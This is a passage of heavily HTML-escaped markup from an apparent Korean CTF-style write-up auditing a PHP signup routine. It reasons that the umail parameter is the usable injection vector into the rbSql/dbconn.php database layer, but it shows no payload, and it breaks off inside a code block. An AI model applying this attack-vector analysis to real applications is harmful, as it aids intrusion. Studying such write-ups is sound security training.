-webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$ret&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbSql&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;insert&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;member_&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$umail&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$upw&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uip&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;1&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a8d450214921-17&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;is_string&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$ret&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;error : insert&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a8d450214921-18&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;&lt;span class=&quot;crayon-ta&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(255, 0, 0) !important;&quot;&gt;&amp;lt;script&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;location&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;href&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;'./?page=login'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-ta&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(255, 0, 0) !important;&quot;&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a8d450214921-19&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a8d450214921-20&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;else&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;join fail&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a8d450214921-21&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/div&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;join_chk in index.php&lt;/strong&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;index.php에서 회원가입을 수행하는 코드입니다. 전달 받는 파라미터는 uid와 umail, upw인데 uid의 경우 ctype_alnum 함수로 인해 알파벳과 숫자만을 입력받으며, upw의 경우 전달하기 전 이미 md5 hash 되기 때문에 공격 벡터로 적절하지 못합니다. 따라서 남은 파라미터는 umail이 될 것입니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;회원가입 시 rbSql 함수의 create와 insert 기능을 수행하기 때문에 dbconn.php에서 이 부분을 집중적으로 확인해야합니다.&lt;/p&gt;&lt;div id=&quot;crayon-5c677473e1a91629720023&quot; class=&quot;crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate&quot; data-settings=&quot; minimize scroll-mouseover&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; text-size-adjust: none; width: 750px; padding: 0px; margin: 12px 0px; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace; color: rgb(60, 72, 88); height: auto; overflow: hidden !important; position: relative !important; direction: ltr !important; border: 1px solid rgb(222, 222, 222) !important; background-color: rgb(248, 248, 255) !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-plain-wrap form-group&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; position: relative; background: 0px center; border: 0px; margin: 0px !important; padding: 0px !important; height: auto !important;&quot;&gt;&lt;textarea wrap=&quot;soft&quot; class=&quot;crayon-plain print-no form-control&quot; data-settings=&quot;dblclick&quot; readonly=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; color: rgb(0, 0, 0); font-style: inherit; font-variant: inherit; font-stretch: inherit; margin: 0px 0px 7px; overflow: hidden; max-width: 100%; padding-top: 0px; padding-right: 5px; padding-left: 5px; display: block; width: 748px; height: 0px; background: linear-gradient(rgb(156, 39, 176), rgb(156, 39, 176)) center bottom / 0px 2px no-repeat, linear-gradient(rgb(210, 210, 210), rgb(210, 210, 210)) center calc(100% - 1px) / 100% 1px transparent; border-width: 0px; border-style: initial; border-color: initial; border-radius: 0px; box-shadow: none; transition: background 0s ease-out 0s; float: none; vertical-align: middle; resize: none; position: absolute; opacity: 0; white-space: pre; overflow-wrap: normal; tab-size: 4; z-index: 0; font-size: 12px !important; line-height: 15px !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important;&quot;&gt;&lt;/textarea&gt;&lt;/div&gt;&lt;div class=&quot;crayon-main&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding: 0px; margin: 0px; width: 748px; overflow: hidden; position: relative; z-index: 1;&quot;&gt;&lt;table class=&quot;crayon-table&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-size: 18px; margin-left: 0px; border-collapse: collapse !important; border-spacing: 0px !important; background: none !important; width: auto !important; border: none !important; padding: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-top: 0px !important; table-layout: auto !important;&quot;&gt;&lt;tbody style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;&lt;tr class=&quot;crayon-row&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: none !important; padding: 0px !important; vertical-align: top !important; margin: 0px !important;&quot;&gt;&lt;td class=&quot;crayon-nums &quot; data-settings=&quot;show&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important;&quot;&gt;&lt;div class=&quot;crayon-nums-content&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: nowrap; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a91629720023-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;1&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a91629720023-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;2&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a91629720023-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;3&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a91629720023-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;4&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a91629720023-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;5&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a91629720023-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;6&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a91629720023-7&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;7&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a91629720023-8&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;8&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a91629720023-9&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 